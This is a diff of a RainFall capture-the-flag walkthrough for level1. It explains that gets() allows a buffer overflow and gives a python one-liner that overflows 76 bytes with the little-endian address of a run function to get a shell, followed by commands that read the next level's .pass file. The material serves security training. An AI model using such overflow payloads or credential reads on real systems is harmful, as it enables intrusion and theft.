gambino9/Rainfall/level1/walkthrough.md

        curity.
 Use fgets() instead.
 ```

-The use of `gets` is discouraged because it cans allow bufferoverflow to happen.
+The use of `gets` is discouraged because it can allow bufferoverflow to happen.

+What we do is overflow the 76 characters, and then write in little endian the address of the `run` function, which will allow us to go into a new shell.

 > level1@RainFall:~$ (python -c 'print "A" * 76 + "\x44\x84\x04\x08"' ; cat) | ./level1
-Good...
+> Good...
 Wait what?

 >cd /home/user/level2
 >cat .pass